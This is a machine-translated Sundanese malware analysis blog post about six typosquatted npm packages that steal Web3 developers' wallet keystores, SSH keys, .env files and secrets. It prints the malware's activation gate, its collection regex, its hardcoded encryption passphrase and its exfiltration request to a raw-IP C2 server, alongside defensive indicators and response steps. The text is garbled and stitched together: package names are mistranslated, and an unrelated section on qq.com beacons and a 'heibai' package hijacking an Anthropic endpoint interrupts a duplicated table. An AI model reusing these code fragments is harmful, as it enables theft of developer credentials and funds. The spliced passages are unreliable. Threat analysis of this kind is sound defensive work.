Serangan Typosquatting npm EVMDeFi Maok Konci Pamekar

Serangan Typosquatting npm EVM/DeFi Maok Konci Pamekar

TL; DR

Dina tanggal 6 Méi 2026, hiji penerbit npm, namikazesarada010206, ngaluncurkeun genep paket jahat anu nargétkeun ékosistem pamekar Ethereum, Solidity, sareng DeFi.

Pakét-pakétna, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, sarta web3-utils-core, nganggo nami anu masuk akal anu dirancang supados katingalina sapertos pustaka pembantu pikeun alat Web3 anu populér.

Sadaya genep bungkus ngandung barang anu sami telemetry.js file. File éta idéntik byte di sakuliah klaster, sareng SHA-256:

Sha-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1

Malware henteu tiasa dijalankeun nalika waktos pamasangan. Teu aya preinstall or postinstall hook. Gantina, éta bakal aktip nalika pakét diimpor ngaliwatan require().

Detil éta penting.

Implant ngantosan dugi ka pamekar leres-leres nganggo pakét éta. Teras éta mariksa naha workstation katingalina sapertos lingkungan pamekaran Ethereum / Solidity anu asli. Éta milarian konci Alchemy atanapi Infura, konci pribadi, mnemonik, konci deployer, atanapi diréktori Foundry lokal.

Upami host cocog, anu maling bakal ngumpulkeun konci pribadi SSH, toko konci dompét Foundry / Geth / Brownie, .env* file, sareng variabel lingkungan anu sénsitip. Éta ngénkripsi bungkusan nganggo AES-256-GCM nganggo frasa sandi anu di-hardcode sareng ngaluarkeunana ka titik tungtung IPv4 C2 atah kalayan verifikasi TLS dinonaktipkeun.

Sistem Peringatan Awal Malware (MEW) Xygeni mastikeun sadaya genep paket salaku paket jahat. Bundel laporan takedown pendaptaran npm nuju ngantosan prosés.

Klasterna: Genep Paket, Hiji Penerbit

Akun penerbit namikazesarada010206 geus dihubungkeun ka alamat Gmail anu teu acan diverifikasi namikazesarada010206@gmail.com.

Kampanye éta muncul salaku publikasi sadinten dina 6 Méi 2026. Sadaya genep pakét diversi salaku 1.0.0, teu boga katergantungan runtime, sarta ngan ngirimkeun tilu file:

package.json index.js telemetry.js

Aranjeunna ogé nyatakeun gudang sumber anu sami:

https://github.com/harunosakura030303-maker/evmchain-config

Tilu pakét anu munggaran katéwak ku pamindai MEW dina publikasi munggaran. Tilu sésana ditandaan sacara paksa saatos analis marios profil npm penerbit. Sakali byte-idéntik anu sami telemetry.js dikonfirmasi di sakuliah klaster, éta ditutup salaku jahat ku konsistensi.

paket Vérsi npm Diterbitkeun Tiket MEW putusan
inti-viem 1.0.0 2026-05-06 01:38:44Z #51049 Jahat
inti-viem-utils 1.0.0 2026-05-06 #51050 Jahat
utils-inti-hardhat 1.0.0 2026-05-06 #51051 Jahat
evm-utils 1.0.0 2026-05-06 #51069 Jahat, ku konsistensi
utilitas pengecoran 1.0.0 2026-05-06 #51071 Jahat, ku konsistensi
web3-utils-core 1.0.0 2026-05-06 #51070 Jahat, ku konsistensi

Strategi penamaan téh lugas tapi efektif.

Pakét-pakét ieu henteu nyamar jadi ngaran hulu anu pasti. Sabalikna, aranjeunna nganggo akhiran "utilitas" anu masuk akal sapertos -core, -utils, sarta -utils-coreÉta ngajantenkeun aranjeunna katingali sapertos pustaka pendamping anu diarepkeun ku pamekar caket kana alat Web3.

Paket Jahat Target Sah
inti-viem viem, klien Ethereum TypeScript anu populér
inti-viem-utils viem
utils-inti-hardhat hardhat, lingkungan pamekaran Solidity umum
evm-utils Namespace parabot EVM umum
utilitas pengecoran pabrik pengecoran, ranté parabot Soliditas
web3-utils-core web3-utils, panyangga Web3.js

Ieu pola "pakét tambahan": sanés "Abdi téh pakét anu saleresna," tapi "Abdi katingalina sapertos pembantu anu wajar di sakitar pakét anu saleresna."

Pikeun pamekar DeFi anu gancang gerak, éta cekap pikeun nyiptakeun résiko.

Naon Anu Kajadian Nalika Pakét Diimpor

Ranté seranganna leutik, ngahaja, sareng museur kana lingkungan pamekaran kripto.

Teu aya gantungan pamasangan. Gantina, unggal pakét ngawengku hiji index.js anu ngékspor fungsi stub teras ngamuat modul telemetri jahat.

require('./telemetry').init();

Ieu hartina malware bakal aktip dina impor munggaran.

Éta sacara operasional mangpaat pikeun panyerang. Seueur scanner sareng sandbox museur kana paripolah waktos pamasangan. Paket ieu ngantosan dugi ka leres-leres dianggo ku pamekar, skrip build, test suite, atanapi jalur runtime.

Gerbang Aktivasina: Ngan Aktifkeun dina Workstation Pamekar Web3 Asli

Bagian anu paling penting tina implan nyaéta gerbang aktivasi.

Malware ieu mariksa variabel lingkungan anu umumna kapanggih dina mesin pamekar Ethereum / Solidity:

const indicators = [   process.env.ALCHEMY_API_KEY,   process.env.INFURA_KEY,   process.env.PRIVATE_KEY,   process.env.MNEMONIC,   process.env.DEPLOYER_KEY, ].filter(Boolean);

Éta ogé mariksa naha Foundry sigana parantos dipasang:

fs.existsSync(path.join(os.homedir(), '.foundry'))

Upami dua-duana kaayaan henteu leres, fungsi éta bakal mulang sareng henteu ngalakukeun nanaon.

Éta ngajantenkeun pakét langkung sepi dina lingkungan analisis umum. Sandbox tanpa Foundry, konci Alchemy, konci Infura, konci pribadi, atanapi mnemonik tiasa ningali impor anu katingalina teu bahaya.

Dina host anu cocog, malware ngantosan 60 dugi ka 90 detik sateuacan dikumpulkeun:

setTimeout(() => { try { _collect(); } catch {} },           60000 + Math.random() * 30000).unref();

Reureuh ieu ngirangan korélasi anu jelas antara impor sareng éksfiltrasi. .unref() panggero ogé ngamungkinkeun prosés host kaluar sacara normal upami pakét diimpor dina skrip anu umurna pondok.

Ieu sanés paripolah smash-and-grab anu ribut. Ieu mangrupikeun maling anu ditargetkeun anu dirancang pikeun nyingkahan jalan kecuali lingkungan pamekar pantes dicolong.

Naon anu dikumpulkeun ku si maling

Sakali gerbang aktivasi lulus, malware bakal ngumpulkeun tina sumber anu paling penting dina pamekaran Web3: konci pribadi, toko konci dompét, kredensial palaksanaan, rahasia awan, token npm, sareng konfigurasi proyék lokal.

sumber Naon Anu Dikumpulkeun
prosés.env Variabel naon waé anu cocog sareng /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MMEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* File anu ngandung PRIVATE KEY atanapi BEGIN OPENSSH, kalebet eusi file lengkep
~/.pabrik/toko konci/* File konci dompét pengecoran
~/.ethereum/toko konci/* File konci dompét Geth
~/.brownie/akun/* File konci dompét brownie
${cwd}/.env Eusi file lengkep
${cwd}/.env.local Eusi file lengkep
${cwd}/.env.produksi Eusi file lengkep
${cwd}/.env.pangembangan Eusi file lengkep
os.ngaranhost() Metadata host
crypto.randomUUID() Identipikasi korban/sesi
Tanggal.ayeuna() Cap waktos pangumpulan
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com

Token ATTA nyaéta:

ATTA_ID 00400014144 ATTA_TOKEN 6478159937

Kami teu acan tiasa mastikeun naha telemetri éta mangrupikeun analitik operator nyalira atanapi saluran anu dimonetisasi sacara misah. Token ATTA sami dina dua sampel anu kami pariksa.

Klaster B: heibai

claude.hk OAuth Phishing + Pembajakan ANTHROPIC_BASE_URL

Sampel 1 April mangrupikeun bagian kampanye anu langkung kasar sareng langkung awal.

heibai:2.1.88-claude.hk-4 dipedalkeun ku wuguoqiangvip28, akun anu didamel tanggal 7 Juni 2025. Pakét éta sacara éksplisit ngarobih vérsi sorangan ngalawan anu sah 2.1.88 Pelepasan antropik.

Éta henteu ngaganggu CA-cert MITM. Sabalikna, éta bohong ka pangguna ngeunaan titik tungtung OAuth.

Tambahan jahat di luhur sumber Claude Code anu bocor kalebet:

sumber Naon Anu Dikumpulkeun
prosés.env Variabel naon waé anu cocog sareng /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MMEMONIC|AWS|NPM|DEPLOY/i
~/.ssh/* File anu ngandung PRIVATE KEY atanapi BEGIN OPENSSH, kalebet eusi file lengkep
~/.pabrik/toko konci/* File konci dompét pengecoran
~/.ethereum/toko konci/* File konci dompét Geth
~/.brownie/akun/* File konci dompét brownie
${cwd}/.env Eusi file lengkep
${cwd}/.env.local Eusi file lengkep
${cwd}/.env.produksi Eusi file lengkep
${cwd}/.env.pangembangan Eusi file lengkep
os.ngaranhost() Metadata host
crypto.randomUUID() Identipikasi korban/sesi
Tanggal.ayeuna() Cap waktos pangumpulan

Daptar targetna spésifik pisan. Ieu sanés maling browser umum atanapi scraping kredensial anu lega. Ieu ditujukeun pikeun pamekar anu ngawangun, nguji, nyebarkeun, atanapi ngoperasikeun aplikasi Ethereum.

Kaasupna keystore Foundry, Geth, sareng Brownie téh penting pisan. File-file ieu tiasa ngawakilan aksés langsung kana dompét atanapi idéntitas palaksanaan. Upami panyerang tiasa masangkeunana sareng kecap akses, mnemonik, atanapi rahasia lingkungan, aranjeunna tiasa mindahkeun dana, nyamar janten panyebar, atanapi ngaganggu operasi kontrak cerdas.

Énkripsi Sateuacan Ékstrafiltrasi

Malware éta ngénkripsi data anu dikumpulkeun sateuacan dikirimkeun.

const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);

Kecap akses anu dikodekeun sacara teuas nyaéta:

a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d

Payload ahir dibungkus salaku JSON:

{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"}

Énkripsi teu ngajadikeun malware leuwih maju ku sorangan. Nanging, éta ngajadikeun pamariksaan jaringan leuwih hésé. Pamekar anu ningali jalan kaluar bakal ningali muatan JSON, tapi sanés konci anu dipaling, file dompét, atanapi .env eusi tanpa frasa sandi sareng logika dekripsi anu di-hardcode.

Ékfiltrasi ka IPv4 C2 Atah

Jalur éksfiltrasi dikodekeun sacara ketat:

const req = https.request({   hostname: '76.13.37.80', port: 8443,   path: '/api/v1/telemetry', method: 'POST',   headers: { 'Content-Type': 'application/json', ... },   rejectUnauthorized: false, timeout: 8000, }, () => {});

Malware ngirim data ka:

https://76.13.37.80:8443/api/v1/telemetry

Dua detil anu nonjol.

Mimitina, C2 mangrupikeun alamat IPv4 atah tinimbang domain. Éta ngaleungitkeun kabutuhan pikeun pendaptaran domain sareng nyingkahan sababaraha deteksi berbasis domain.

Kadua, verifikasi TLS dinonaktipkeun ku:

rejectUnauthorized: false

Éta ngamungkinkeun malware pikeun nampi sertipikat naon waé, kalebet sertipikat anu ditandatanganan ku nyalira. Kalayan kecap sanésna, panyerang nampi transportasi énkripsi tanpa peryogi sertipikat umum anu valid.

Teu aya logika coba deui sareng teu aya host cadangan. Kasalahan ditelan sacara teu langsung. Ieu ngajaga pakét tetep jempe upami C2 offline atanapi teu tiasa dihubungi.

Naha Kampanye Ieu Penting

Kaseueuran pakét npm jahat anu ditujukeun pikeun pamekar ngudag kredensial anu lega: token npm, konci AWS, token GitHub, atanapi .npmrc payel.

Kampanye ieu ngaheureutan target.

Éta milarian tanda-tanda yén mesin éta milik pamekar Ethereum atanapi Solidity. Teras éta narik persis aset anu penting dina lingkungan éta: dompét konci, konci pribadi, mnemonik, konci deployer, .env file, sareng konci SSH.

Éta ngajantenkeun kampanye langkung bahaya pikeun tim Web3 tibatan maling npm umum.

Inféksi anu suksés tiasa ngalaan:

  • Dompét palaksanaan
  • Konci admin kontrak pinter
  • Konci panyadia RPC
  • Kredensial palaksanaan awan
  • token penerbitan npm
  • Aksés SSH ka infrastruktur pamekar atanapi wangunan
  • Rahasia proyék disimpen dina .env payil
  • Tempat konci dompét pikeun Foundry, Geth, atanapi Brownie

Ngaran pakét ogé némbongkeun rékayasa sosial anu jelas. Éta narékahan ékosistem pamekar Web3 ngaliwatan ngaran alat anu biasa: viem, hardhat, foundry, evm, sarta web3.

Aktorna teu kedah ngorbankeun proyék anu saleresna. Aranjeunna ngan ukur peryogi pamekar pikeun masang pakét pendamping anu katingalina lumayan.

Indikator Kompromi sareng Deteksi

Paket sareng Penerbit
lapang ajen
penerbit npm namikazesarada010206
Surélék penerbit namikazesarada010206@gmail.com
Surélék diverifikasi teu
SCM diverifikasi teu
Skor reputasi 1.0
bungkusan viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, web3-utils-core
versi kabéh 1.0.0
Gudang sumber https://github.com/harunosakura030303-maker/evmchain-config
Dikonfirmasi jahat Sadayana genep pakét
Network
ngetik ajen
Titik tungtung C2 https://76.13.37.80:8443/api/v1/telemetry
IP C2 76.13.37.80
Palabuhan C2 8443/tcp
Paripolah TLS nolakTeu diidinan: palsu
Skéma muatan {"v":2,"iv": ,"d": "t": }
File sareng Hash
ngetik ajen
telemetry.js SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1
Tata letak pakét package.json, index.js, telemetry.js
Jumlah file 3
Ukuran total perkiraan 3.4 KB

Sinyal Aktivasina

Malware mariksa variabel lingkungan ieu:

ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY

Éta ogé mariksa:

~/.foundry/

Jalur Host anu Disasar

~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development

Regex Koleksi

/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i

Catetan Deteksi

Sababaraha aturan nangkep kampanye ieu tanpa peryogi analisis paripolah lengkep.

Mimitina, scan file konci pikeun genep nami pakét jahat:

viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core

Pertandingan naon waé dina package-lock.json, yarn.lock, pnpm-lock.yaml, atawa node_modules sajarah kudu dianggap salaku kajadian anu serius.

Kadua, pantau prosés Node.js anu maca jalur keystore wallet:

~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/

Ieu jarang janten paripolah anu sah pikeun pakét anu diimpor salaku dependensi helper. Ieu khususna curiga nalika dituturkeun ku aktivitas jaringan kaluar.

Katilu, blokir atanapi béwarakeun sambungan HTTPS ka:

76.13.37.80:8443

Utamana nalika jalur pamundut nyaéta:

/api/v1/telemetry

Kaopat, milarian pakét npm anu ngagabungkeun sipat-sipat ieu:

  • Penerbit anyar atanapi anu reputasina handap
  • Akun Gmail anu teu acan diverifikasi
  • Ngaran pakét anu padeukeut jeung Web3
  • Teu aya riwayat gudang anu penting
  • Tata letak pakét leutik
  • index.js anu ngamuat file telemetri atanapi helper
  • Teu aya katergantungan runtime
  • Kumpulan variabel lingkungan anu sénsitip
  • Aksés toko konci dompét

Pola ieu langkung mangpaat tibatan hiji IOC sabab pakét salajengna tiasa ngarobih alamat IP tapi tetep nganggo logika targeting anu sami.

Daptar Pariksa Réspon Kompromi

Upami pamekar nganggo salah sahiji tina genep pakét sareng lingkunganana cocog sareng gerbang aktivasi, anggap workstation éta salaku anu dikompromi.

Éta kalebet mesin anu dipasang Foundry, konci Alchemy atanapi Infura dina lingkunganana, konci pribadi, mnemonik, atanapi konci deployer.

Réspon anu disarankeun:

  • Pegatkeun sambungan host tina jaringan.
  • Ngawétkeun node_modules, file konci, riwayat cangkang, sareng log anu relevan pikeun forensik.
  • Puterkeun unggal pasangan konci SSH di handap ~/.ssh/.
  • Rotasikeun konci dompét pikeun unggal gudang konci di handap ~/.foundry, ~/.ethereum, sarta ~/.brownie.
  • Pindahkeun dana ka dompét anyar.
  • Muterkeun unggal rusiah anu disimpen dina .env* file dina gudang tempat pamekar damel.
  • Rotasikeun rusiah lingkungan anu cocog sareng regex koleksi, kalebet konci AWS, token npm, token deploy, konci API, konci pribadi, siki, sareng mnemonik.
  • Aktivitas audit cloud, npm, GitHub, panyadia RPC, sareng blockchain saprak pakét mimiti dipasang.
  • Gambarkeun deui workstation sateuacan dianggo deui.

Naon Anu Kudu Dicandak ku Para Pembela

Kampanye ieu nunjukkeun kumaha typosquatting npm mekar di sabudeureun ékosistem pamekar anu bernilai tinggi.

Aktorna teu butuh kegigihan. Maranéhna teu butuh pangacakan. Maranéhna malah teu butuh palaksanaan waktu pamasangan.

Gantina, aranjeunna ngandelkeun tilu hal:

  • Ngaran pakét Web3 anu masuk akal
  • Aktivasina ngan ukur dina mesin pamekaran kripto nyata
  • Maling langsung file sareng rahasia anu paling penting pikeun pamekar Ethereum

Éta ngajantenkeun kampanye gampang sono dina pamindaian anu lega sareng bahaya nalika badarat di lingkungan anu pas.

Pikeun tim Web3, palajaranana jelas: anggap nami katergantungan salaku bagian tina modél ancaman anjeun. Pakét anu katingalina sapertos pembantu anu teu bahaya masih tiasa janten jalur pangpondokna pikeun kompromi dompét.

Dilaporkeun ka pendaptaran npm. Kami bakal ngapdet postingan ieu nalika akun penerbit sareng pakét dihapus.

alat-alat-sca-parangkat lunak-analisis-komposisi
Prioritaskeun, remediasi, sareng amankeun résiko parangkat lunak anjeun
Kéngingkeun Akun Gratis anjeun.
Henteu kedah kartu kiridit.

Amankeun Pangwangunan sareng Pangiriman Parangkat Lunak Anjeun

sareng Xygeni Product Suite